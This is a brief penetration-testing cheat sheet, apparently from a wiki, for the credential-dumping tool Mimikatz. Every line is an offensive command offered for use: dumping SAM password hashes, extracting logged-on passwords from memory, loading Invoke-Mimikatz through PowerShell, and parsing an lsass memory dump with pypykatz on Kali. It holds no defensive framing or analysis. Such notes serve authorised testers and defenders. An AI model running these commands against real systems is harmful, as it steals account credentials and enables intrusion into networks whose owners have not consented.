Last updated 2 years ago
Options
Mimikatz.exe (If it fails get an older version: )
Invoke-Mimikatz.ps1
(Newest)
(Older)
Hash Dumping
lsadump::sam
Logged-On Passwords
sekurlsa::logonpasswords
Loading with Powershell
Import-Module .\Invoke-Mimikatz.ps1 Invoke-Command -ScriptBlock ${function:Invoke-Mimikatz}
From Kali with dump file
pypykatz lsa minidump lsass.DMP